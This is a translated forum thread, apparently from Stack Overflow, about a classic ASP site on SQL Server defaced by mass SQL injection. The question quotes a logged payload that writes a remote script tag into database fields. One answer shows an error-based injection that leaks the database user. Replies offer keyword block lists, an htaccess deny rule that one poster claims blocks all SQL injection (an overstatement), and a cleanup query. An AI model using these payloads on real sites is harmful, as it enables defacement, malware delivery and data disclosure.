对使用 SQL Server 数据库的 ASP 站点的攻击

发布于 2024-09-24 15:46:04 字数 1403 浏览 0 评论 0原文

我们有一个调查网站显然遭到了攻击。这些症状与本网站下一页所描述的相同：针对 ASP.NET 网站的 XSS 攻击。

我在 IIS 日志中发现了多个包含恶意代码的条目：

< /标题> <脚本 src = http://google-stats49.info/ur.php>。

以下是 IIS 日志条目之一的 cs-uri-query 字段值的示例。

surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) %2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112) %2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112) %2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45) %2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110) %2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62) %2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar( 8000)),cast(char(32)+as+varchar(8)))--

我不明白上面的代码是如何工作的，但显然这是在查询字符串中发送到数据库表中损坏的列的内容。我们暂时关闭了我们的网站。我们可以从数据库中删除脚本，但这并不能防止当我们使站点重新上线时它再次被损坏。

有人对如何防止这种情况发生有任何建议吗？

原文

分享到QQ

分享到微博

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

需要登录才能够评论，你可以免费注册一个本站的账号。

慢慢从新开始 2024-10-01 15:46:04

这就是 SQL 注入。

永远不要相信用户输入。您正在获取输入并将其直接发送到数据库
永远不要相信您的用户输入！
根据允许值白名单检查所有输入。
对于文本输入，请确保所有内容都被转义

有关此主题的内容有很多：Google 是你的朋友

回复收藏 0 原文

夕嗳→ 2024-10-01 15:46:04

另外...

使用参数化查询。
摆脱旧的经典 ASP，这使得使用参数化查询变得更加困难。迁移到 .NET，它更容易验证，并且可以限制值、禁止 html 输入等。

回复收藏 0 原文

↙温凉少女 2024-10-01 15:46:04

不确定这是否仍然与您相关，但我过去曾发生过这种情况，因为我们仍然运行一些旧的 asp 网站。您需要做两件事来清理它。首先是数据库的查找和替换存储过程（很容易通过 Google 搜索），如果您可以的话。不幸的是，有时数据会根据字段类型被截断，但这里无能为力。否则，需要回滚您的数据库。

其次是在数据库连接之前插入一个 SQL 注入黑客防护脚本，如下所示：

祝你好运。

<% ' SqlCheckInclude.asp ' ' This is the include file to use with your asp pages to ' validate input for SQL injection. 暗黑名单，错误页面，s ' ' 下面是一个黑名单，它将阻止某些 SQL 命令并 ' SQL 注入中使用的序列将有助于输入清理 ' ' 然而这可能还不够，因为： ' 1）这些可能无法涵盖所有情况（例如编码字符） ' 2) 这可能不允许合法输入 ' ' 通过连接用户输入创建原始 sql 查询字符串是 ' 不安全的编程实践。建议您使用参数化 ' 改为 SQL。检查 http://support.microsoft.com/kb/q164485/ 了解信息 ' 关于如何使用 ASP 中的 ADO 来执行此操作。 ' ' 此外，您还需要为您的参数实现一个白名单。 ' 例如，如果您需要输入邮政编码，您应该创建 ' 只允许 [0-9] 中包含 5 个字符的验证规则。 ' 黑名单 = Array("--", ";", "/", "/", "@@", "@",_ “char”，“nchar”，“varchar”，“nvarchar”，_ “改变”，“开始”，“转换”，“创建”，“光标”，_ “声明”、“删除”、“删除”、“结束”、“执行”、_ “执行”，“获取”，“插入”，“杀死”，“打开”，_ “选择”，“系统”，“系统对象”，“系统列”，_ "table", "update") ' 填充您想要重定向到的错误页面，以防万一 ' 检查失败。 ErrorPage = "/ErrorPage.asp" '''''''''''''''''''''''''''''''''''''''' ''''''''' ' 该函数不检查编码字符 ' 因为我们不知道您的应用程序的编码形式 ' 使用。添加适当的逻辑来处理编码字符 '在这里 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' 函数 CheckStringForSQL(str) On Error Resume Next Dim lstr ' 如果字符串为空，则返回 true 如果 ( IsEmpty(str) ) 那么 CheckStringForSQL = false 退出功能 ElseIf ( StrComp(str, "") = 0 ) 那么 CheckStringForSQL = false 退出功能 End If lstr = LCase(str) ' 检查字符串是否包含我们的任何模式 ' 黑名单 For Each s in BlackList If ( InStr (lstr, s) <> 0 ) Then CheckStringForSQL = true Exit Function End If Next CheckStringForSQL = false End Function '''''''''''''''''''''''''''''''''''''' '''''''''''' ' 检查表单数据 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' 对于 Request.Form 中的每个 s 如果 ( CheckStringForSQL(Request.Form(s)) ) 那么 ' Redirect to an error page Response.Redirect(ErrorPage) 结束如果下一个 ''''''''''''''''''''''''''''''''''''''''''''''''' ” ' 检查查询字符串 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' 对于 Request.QueryString 中的每个 s If ( CheckStringForSQL(Request.QueryString(s)) ) then ' Redirect to error page Response.Redirect(ErrorPage) End If Next ''''''''''''''''''''''''''''''''''' ''''''''''''''' '检查cookies '''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' 对于 Request.Cookies 中的每个 If ( CheckStringForSQL(Request.Cookies(s)) ) then ' Redirect to error page Response.Redirect(ErrorPage) End If Next ''''''''''''''''''''''''''''''''' '''''''''''''''' ' 为您的应用程序的输入添加额外的检查 ' 使用。（例如您的应用程序的各种请求标头 ' 可能会使用） '''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' %>

Not sure if this is still relevant for you, but I have had this happen in the past as we still run some old asp sites. There are two things you need to clean this up. First is a find and replace stored procedure for your database (easy enough to Google this), if you can get away with it. Unfortunately sometimes the data is cut off depending on the field type, but there is nothing to do here. Otherwise a roll back for your db is necessary.

Second is insert a SQL injection hack prevention script like this as an include before your database connection:

Good luck.

<% ' SqlCheckInclude.asp ' ' This is the include file to use with your asp pages to ' validate input for SQL injection. Dim BlackList, ErrorPage, s ' ' Below is a black list that will block certain SQL commands and ' sequences used in SQL injection will help with input sanitization ' ' However this is may not suffice, because: ' 1) These might not cover all the cases (like encoded characters) ' 2) This may disallow legitimate input ' ' Creating a raw sql query strings by concatenating user input is ' unsafe programming practice. It is advised that you use parameterized ' SQL instead. Check http://support.microsoft.com/kb/q164485/ for information ' on how to do this using ADO from ASP. ' ' Moreover, you need to also implement a white list for your parameters. ' For example, if you are expecting input for a zipcode you should create ' a validation rule that will only allow 5 characters in [0-9]. ' BlackList = Array("--", ";", "/", "/", "@@", "@",_ "char", "nchar", "varchar", "nvarchar",_ "alter", "begin", "cast", "create", "cursor",_ "declare", "delete", "drop", "end", "exec",_ "execute", "fetch", "insert", "kill", "open",_ "select", "sys", "sysobjects", "syscolumns",_ "table", "update") ' Populate the error page you want to redirect to in case the ' check fails. ErrorPage = "/ErrorPage.asp" ''''''''''''''''''''''''''''''''''''''''''''''''''' ' This function does not check for encoded characters ' since we do not know the form of encoding your application ' uses. Add the appropriate logic to deal with encoded characters ' in here ''''''''''''''''''''''''''''''''''''''''''''''''''' Function CheckStringForSQL(str) On Error Resume Next Dim lstr ' If the string is empty, return true If ( IsEmpty(str) ) Then CheckStringForSQL = false Exit Function ElseIf ( StrComp(str, "") = 0 ) Then CheckStringForSQL = false Exit Function End If lstr = LCase(str) ' Check if the string contains any patterns in our ' black list For Each s in BlackList If ( InStr (lstr, s) <> 0 ) Then CheckStringForSQL = true Exit Function End If Next CheckStringForSQL = false End Function ''''''''''''''''''''''''''''''''''''''''''''''''''' ' Check forms data ''''''''''''''''''''''''''''''''''''''''''''''''''' For Each s in Request.Form If ( CheckStringForSQL(Request.Form(s)) ) Then ' Redirect to an error page Response.Redirect(ErrorPage) End If Next ''''''''''''''''''''''''''''''''''''''''''''''''''' ' Check query string ''''''''''''''''''''''''''''''''''''''''''''''''''' For Each s in Request.QueryString If ( CheckStringForSQL(Request.QueryString(s)) ) Then ' Redirect to error page Response.Redirect(ErrorPage) End If Next ''''''''''''''''''''''''''''''''''''''''''''''''''' ' Check cookies ''''''''''''''''''''''''''''''''''''''''''''''''''' For Each s in Request.Cookies If ( CheckStringForSQL(Request.Cookies(s)) ) Then ' Redirect to error page Response.Redirect(ErrorPage) End If Next ''''''''''''''''''''''''''''''''''''''''''''''''''' ' Add additional checks for input that your application ' uses. (for example various request headers your app ' might use) '''''''''''''''''''''''''''''''''''''''''''''''''''

%>

回复收藏 0 原文

小女人ら 2024-10-01 15:46:04

将 IIS 配置为发送自定义错误页面或默认错误 500 页面，而不是向客户端发送详细的错误消息。

详细的错误消息已用于查找数据库模式。然后他们使用 SQL 注入来更新文本字段。

这是获取数据库用户的示例：

/page.asp?realparameter=1And%20char(94)%2Buser%2Bchar(94)=0

即“and ^+user+^=0”，它返回：

[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Conversion_failed_when_converting_nvarchar_value_'^myDbUsername^'_to_data_type_int。

其中“myDbUsername”是您的真实数据库用户。

使用类似的技术，可以一一获取数据库、表、列、类型等。

如果您尚未受到攻击，请禁用 IIS 中的详细错误，否则请检查日志以查找哪些页面存在 SQL 注入漏洞并进行更正。

我编写了一个小脚本来检查我的数据库中是否有“

DECLARE c1 cursor for SELECT 'SELECT COUNT(*), '''+QUOTENAME(TABLE_SCHEMA)+'.'+QUOTENAME(TABLE_NAME)+''', '''+QUOTENAME(COLUMN_NAME)+''''+ 
' FROM ' + quotename(TABLE_SCHEMA) + '.'+QUOTENAME(TABLE_NAME) +
' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%<script%'''
FROM INFORMATION_SCHEMA.COLUMNS c
WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext') 
and QUOTENAME(TABLE_NAME) not in (SELECT QUOTENAME(name)AS TABLE_NAME FROM sys.views)
order by QUOTENAME(TABLE_NAME);
DECLARE @CMD VARCHAR(200), @return varchar(10)
OPEN C1
FETCH NEXT FROM C1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
    BEGIN
        declare @sql nvarchar(500), @tbl varchar(200), @col varchar(200)
        set @sql = 'declare c2 cursor for ' + @CMD
        exec sp_executesql @sql
        open c2
        FETCH NEXT FROM C2 INTO @return, @tbl, @col
        WHILE @@FETCH_STATUS <> -1
            BEGIN
            if(@return > 0)
                BEGIN
                    PRINT @return + ' records found in ' + @tbl + '.' + @col
                    exec('SELECT '+@col+' FROM '+@tbl+' WHERE '+@col+' LIKE ''%<script%''')
                END
            FETCH NEXT FROM C2 INTO @return, @tbl, @col
            END
        CLOSE C2
        DEALLOCATE C2
        FETCH NEXT FROM C1 INTO @CMD
    END
CLOSE C1
DEALLOCATE C1

我使用的是 IIS 7、Win Server 2008 和 SQL Server 2008，因此这次攻击似乎没有使用任何 SQL Server 2003 / 2005 漏洞网上很多文章都有提到。

Configure your IIS to send a custom error page or the default error 500 page instead of sending detailed error messages to the client.

Detailed error messages has been used to find the db schema. Then they used sql injection to update text fields.

Here's an example to get the DB user:

/page.asp?realparameter=1And%20char(94)%2Buser%2Bchar(94)=0

that is "and ^+user+^=0" and it returns:

[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Conversion_failed_when_converting_nvarchar_value_'^myDbUsername^'_to_data_type_int.

where "myDbUsername" is your real database user.

Using a similar tecnique it is possible to get databases, tables, columns, types etc. one by one.

If you have not been already attacked then disable detailed errors in IIS, otherwise check your logs to find which pages have sql injection vulnerabilities and correct them.

I wrote a small script to check if there are "<script" in my database:

DECLARE c1 cursor for SELECT 'SELECT COUNT(*), '''+QUOTENAME(TABLE_SCHEMA)+'.'+QUOTENAME(TABLE_NAME)+''', '''+QUOTENAME(COLUMN_NAME)+''''+ 
' FROM ' + quotename(TABLE_SCHEMA) + '.'+QUOTENAME(TABLE_NAME) +
' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%<script%'''
FROM INFORMATION_SCHEMA.COLUMNS c
WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext') 
and QUOTENAME(TABLE_NAME) not in (SELECT QUOTENAME(name)AS TABLE_NAME FROM sys.views)
order by QUOTENAME(TABLE_NAME);
DECLARE @CMD VARCHAR(200), @return varchar(10)
OPEN C1
FETCH NEXT FROM C1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
    BEGIN
        declare @sql nvarchar(500), @tbl varchar(200), @col varchar(200)
        set @sql = 'declare c2 cursor for ' + @CMD
        exec sp_executesql @sql
        open c2
        FETCH NEXT FROM C2 INTO @return, @tbl, @col
        WHILE @@FETCH_STATUS <> -1
            BEGIN
            if(@return > 0)
                BEGIN
                    PRINT @return + ' records found in ' + @tbl + '.' + @col
                    exec('SELECT '+@col+' FROM '+@tbl+' WHERE '+@col+' LIKE ''%<script%''')
                END
            FETCH NEXT FROM C2 INTO @return, @tbl, @col
            END
        CLOSE C2
        DEALLOCATE C2
        FETCH NEXT FROM C1 INTO @CMD
    END
CLOSE C1
DEALLOCATE C1

I'm on IIS 7, Win Server 2008 and SQL Server 2008 so it doesn't seems this attack uses any SQL Server 2003 / 2005 vulnerabilities as stated in many articles on the web.

回复收藏 0 原文

给不了的爱 2024-10-01 15:46:04

您受到了 LizaMoon 自动 SQL 注入漏洞包的攻击，现在在该公司页面上的一篇文章中提到了该公司，该公司被认为是最先记录该攻击的：http://community.websense.com/blogs/securitylabs/archive/2011/03/ 31/update-on-lizamoon-mass-injection.aspx

回复收藏 0 原文

夜无邪 2024-10-01 15:46:04

BulletProof Security WordPress 插件具有 SQL 注入过滤器，可以在 htaccess 文件中阻止此攻击。由于您有一个 IIS 服务器，因此您需要添加其他功能来使用 htaccess 文件，或者您可以以其他方式将 SQL 注入过滤器与 IIS 合并，因为 htaccess 传统上是 Apache 的东西。这是 BulletProof Security 主 htaccess 文件中阻止所有 SQL 注入黑客尝试的行：

RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC] 
RewriteRule ^(.*)$ - [F,L]

The BulletProof Security WordPress plugin has the SQL Injection filters that will block this attack in an htaccess file. Since you have an IIS server you would need to add additional features that would enable you to use an htaccess file or maybe you could incorporate the SQL Injection filters in some other way with IIS since htaccess is traditionally an Apache thing. This is the line in the BulletProof Security master htaccess file that blocks ALL SQL Injection hacking attempts:

RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC] 
RewriteRule ^(.*)$ - [F,L]

回复收藏 0 原文

~没有更多了~